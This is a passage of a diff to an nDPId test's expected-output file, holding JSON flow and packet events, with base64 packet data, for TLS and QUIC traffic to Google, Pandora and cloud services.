+00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646495836963,"flow_last_seen":1646495837006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646495837006,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"googleplus.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495837086,"flow_last_seen":1646495837086,"flow_idle_time":180000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495837086,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.181.238","src_port":36832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02265{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1646495837086,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1399,"pkt_l4_len":1365,"thread_ts_msec":1646495837086,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAVpAABAAEARLnPAqAGAjvq17o\/gAbsFVdqKwQAAAAEIGskra7CKZYEDuYLxAEIVFxxqmZ08lCd3LEamnRnTwqMewjQTOXHJ+bQBCnc75qyddTeYHQ3SnzAULSCTOvy9BuronZfx+Rok2NEb\/1BsWpwM7HvouqIbg\/UM9rh+Oz94fTVRKCbJSe1Rt9Wi3IS3cTWhF88qqkbPlVNVfTP6qf147kmXwAclEb200UQEzcAZIv3o++EPu3L79R8FmBpBYJnCKkgaxbqODau1mi\/955te0zmkf2846gwZzwMXzDwbr6\/3HnP3h8OfoVM0MIFN9x7Ds+vGpVKDRpQM0NlvNQfFfblQvgPKr6\/wJHgowwd40oBCNI3FTXFgafKbw2f8iXs1MuIi6dbw5qDMfDg7neN7v6\/vcX4HSf8y6PVeyxCvA4+7q957ap\/3PII07iu47YhDzCD0lwTDjfi\/a1raoLz70\/SPK9NEbeWnxibfZXFeg8+E6Qmd9DFP4zQ2QPKahjqlPM4ZePdB1N+sWTrGnHY+e5VOY4qYOyABuFGeuadAN35ZvnTav7s\/+rzxtiAo1AWyqO5W85hkYntoGdWyMOzcrhaGvKoJNlyQWa3gWJkpY39Z1uzVJ9G3lDdAsC9\/zRJfbRKvAouMAfcWbKNWIPlVEx425CNhqzWnjNjSzKi5ec4e5C4us09IcxcJ6YiARP3HINF5Ycp8CM+O3SAPpWjAj1wgjVCtDNLk+H+lVLgNqHb0nSuRRFGscCZoJV0VpfhM0MYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646495837086,"flow_last_seen":1646495837086,"flow_idle_time":180000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1357,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646495837086,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.181.238","src_port":36832,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GooglePlus","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"plus.google.com","version":"TLSv1.3","alpn":"h3","ja3":"b719940c5ab9a3373cb4475d8143ff88","tls_supported_versions":"TLSv1.3"}} 
02275{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1646495837102,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1399,"pkt_l4_len":1365,"thread_ts_msec":1646495837102,"pkt":"PKn0qB\/spJGxgjQ5CABFgAVpAABAADMROvOO+rXuwKgBgAG7j+AFVSXtyAAAAAEDuYLxCBrJK2uwimWBAEU4Tznrzq28hb1XmRDs0MFqelTnhcFUZ84H4q1aY4G8iO4oHDfc48pBHn\/VwFJa95gqSHvH4Ev8Om2dP0drKfHTm5RIabnMUwABEpNiK30Wb+s0DC1P8fJqrYirSkcMUtk+OScepXvvMoUJqb3oK\/SHueY\/CR+1r94ahlb+lQ5CMkRrFEpV8Y80c9Tk558ky1YvZroBJocv+D8x22dTrB3Nr2zV5BXUe4IfZjyM1uOvrGOzm7BFlSrMgOj6FKIkCgp\/pf+jrmIN6zoTCYHljLfpxOi3CtJlotE5kvBNJfYTIlpV6ePxOeaBHnLAnR8AUiLMe4EQhoCyafpPSu2uRilBt0zY24SPHj+Vr1q8JDD3+tdbrEpwnhqALSf4fMlI0nlCiW6KDCz9YYUL75K4IS9444yNzf1Yr99Mh0kbqbRkqVD2lz0sc+tejmla91jt2s1ymwqM2Dkc57wq\/ZGL2qTvHoCDCrWXzzSFq2DtMODbeFddKrW7D2S\/WC6gNpi8CkmnUEfrksPztXbMxr+4svM2m36IzD+uTDtBonQOeeetS42fSNmayHtkfbHFRhxhKIWxbXnDeYhaHVYjCQ+4X0zwkTVPladnLIcVEBYqwYQv5\/bz9ieX8wyoykaDLtE9CrJi2EKtZ8wkCC7Z741Zd+Wml1GFTEX8vTPcXOs4jWXGa8by36ak7R21cVgtCbMzCsX51MXYO9rxKpqzQ90YL3ZJybESTLyCZVaetnFQQy0zj9i3aMbEeaF1GIY8fpv41LJIfBTcuddEsku5mHk0ET+hIJRQHhrqv3\/7dLCFIB8IbFzqoMNXvst3vFd153RNd4+wDFw0PTKp3WxAax7aH3o4vpIKkH5MYZZm6QdYg4AXeCOVs+yOQckfo449mppsZnBCauNFwyGHgfdImQc5ChUcBackKfZKPm+8gpfez3Lh5cIH5TVZfBcX2049yxCxwBIQNMHRFZ\/l6px98JrGqv9wlLvZ9x05f9o+OBwqtGjSma1n6CqkHTjCKDb9wEKbD27oXi\/IB1KPHp2u9d\/c+7X2RVtjWmizhI43eqsfAt6YQSI\/I6i5XWGJRa1qw\/6lLbvQvj\/jHqXTS68GWhBdBLJUtfTko6qCsN7rqu1qRzGoIhl0BkGE92lNyYY\/ZTU6\/hdcvPHH\/gVolLu3hFDPu+ipgvDDLIZuRl+UaoOI4gJccnN1m37oKsX6NQtnyeGSc2tM6+62ei3A6X8waSaElCusvteiUGCHQxwaHmAxN+l0Fnrtj2W9v8HqhbG8zavLaMSK9TCSurpq1GtTp5SAztNP1KCrvVnqVhJrjpPBsMoRZgIibHU+b02bSrZ5vLUq8fMRq1DHjSpmxuFXNZXv4gyNl3Dl6lhcF466Vu3DVIKOpmXUnOt94P9drBleL2pc6g\/Rsi+uKui90velUE0hGPgoOIhhDJ0ymy34LYnDdDZuGwprFKEAglwy2+YC1sXbba6gKVjcOV1Ca5zHuLIWZHit470RXXzr7m1Xi\/5cXZ
YyKSyJACVo6ge6ve+Upi7YI+aW+jgyPqmHMKb+I\/eIOcKZeHyih24R2l7AgjvcvMggC5W8nbNUSu9cpnGWdlPqjTB0D+d7oT5+bGyUabkzh3dJ2t9fzH8gnGtlT1zFzufTmcBCKpbCY6sP\/0lUq7vHjuvu650M0IhuYA8e9G78Y8vHGY8YN9zIOLD+CF2bDXHwqf3VW0Z0KdlLeLkOH0oqFJ9UgLOZLQqYMUReoZ97In3a7hJ65ZurIhpFxCeAoO9kMhJrGIJTN\/Ls9g=="} 00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":513,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":513,"packets-processed":512,"total-skipped-flows":0,"total-l4-data-len":233934,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":42,"total-detection-updates":47,"total-updates":0,"current-active-flows":10,"total-active-flows":46,"total-idle-flows":36,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":319,"global_ts_msec":1646568788171} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646568788171,"flow_last_seen":1646568788171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646568788171,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1646568788171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646568788171,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8AQRAAEAGfpzAqAGA0FUontLaAbs4n4KKAAAAAKAC+vB1NgAAAgQFtAQCCArSjLpwAAAAAAEDAwc="} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1646568788337,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646568788337,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8Ke1AAPAGpbLQVSiewKgBgAG70tpN2CtOOJ+Ci6ASOQiNqgAAAgQFtAEDAwAEAggKXyXRHtKMunA="} -01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1646568788341,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646568788341,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5AQZAAEAGfJ3AqAGA0FUontLaAbs4n4KLTdgrT4AYAfYOtAAAAQEICtKMuxtfJdEeFgMBAgABAAH8AwNyi5pZnYizmESRNRsWFzLDUgF4AIT\/tX3zYbufDRkzzyDMV\/FK528iuv6PxN\/1DD4BU1TMzFBPBIF01ZAvPFWIVwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtwYW5kb3JhLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBUk5TxRwMmI7m3PUpmyv2jiTq1G62x80KdY2tfOvxfVgAXAEEEr8O4oznU2jNZk5ZC+\/pUpJeqcDtGn2NikTZa2J69CfKpIdzohOHLj9fffI5zTez3ppU6JIFTO2\/VBVQmSVbRwwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646568788171,"flow_last_seen":1646568788341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646568788341,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646568788171,"flow_last_seen":1646568788508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646568788508,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"7047b9d842ee4b3fba6a86353828c915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-01231{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":518,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646568788171,"flow_last_seen":1646568788673,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3789,"flow_avg_l4_payload_len":631,"midstream":0,"thread_ts_msec":1646568788673,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","server_names":"*.pandora.com,pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"7047b9d842ee4b3fba6a86353828c915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust TLS RSA CA G1","subjectDN":"C=US, ST=California, L=Oakland, O=Pandora Media, LLC, CN=*.pandora.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"40:BB:03:6C:E8:D4:7C:D7:72:59:2F:8D:DB:4B:64:4F:8F:C4:EB:AF"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495669804,"flow_last_seen":1646495669824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"}} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495697787,"flow_last_seen":1646495697827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495836963,"flow_last_seen":1646495837006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646568788171,"flow_last_seen":1646568788847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4237,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1646495710534,"flow_last_seen":1646495710610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6845,"flow_avg_l4_payload_len":684,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646568788171,"flow_last_seen":1646568788171,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646568788171,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1646568788171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646568788171,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8AQRAAEAGfpzAqAGA0FUontLaAbs4n4KKAAAAAKAC+vB1NgAAAgQFtAQCCArSjLpwAAAAAAEDAwc="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1646568788337,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646568788337,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8Ke1AAPAGpbLQVSiewKgBgAG70tpN2CtOOJ+Ci6ASOQiNqgAAAgQFtAEDAwAEAggKXyXRHtKMunA="} +01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1646568788341,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646568788341,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5AQZAAEAGfJ3AqAGA0FUontLaAbs4n4KLTdgrT4AYAfYOtAAAAQEICtKMuxtfJdEeFgMBAgABAAH8AwNyi5pZnYizmESRNRsWFzLDUgF4AIT\/tX3zYbufDRkzzyDMV\/FK528iuv6PxN\/1DD4BU1TMzFBPBIF01ZAvPFWIVwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtwYW5kb3JhLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACBUk5TxRwMmI7m3PUpmyv2jiTq1G62x80KdY2tfOvxfVgAXAEEEr8O4oznU2jNZk5ZC+\/pUpJeqcDtGn2NikTZa2J69CfKpIdzohOHLj9fffI5zTez3ppU6JIFTO2\/VBVQmSVbRwwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646568788171,"flow_last_seen":1646568788341,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646568788341,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":516,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646568788171,"flow_last_seen":1646568788508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646568788508,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"7047b9d842ee4b3fba6a86353828c915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+01231{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":518,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646568788171,"flow_last_seen":1646568788673,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3789,"flow_avg_l4_payload_len":631,"midstream":0,"thread_ts_msec":1646568788673,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pandora.com","server_names":"*.pandora.com,pandora.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"7047b9d842ee4b3fba6a86353828c915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust TLS RSA CA G1","subjectDN":"C=US, ST=California, L=Oakland, O=Pandora Media, LLC, CN=*.pandora.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"40:BB:03:6C:E8:D4:7C:D7:72:59:2F:8D:DB:4B:64:4F:8F:C4:EB:AF"}} 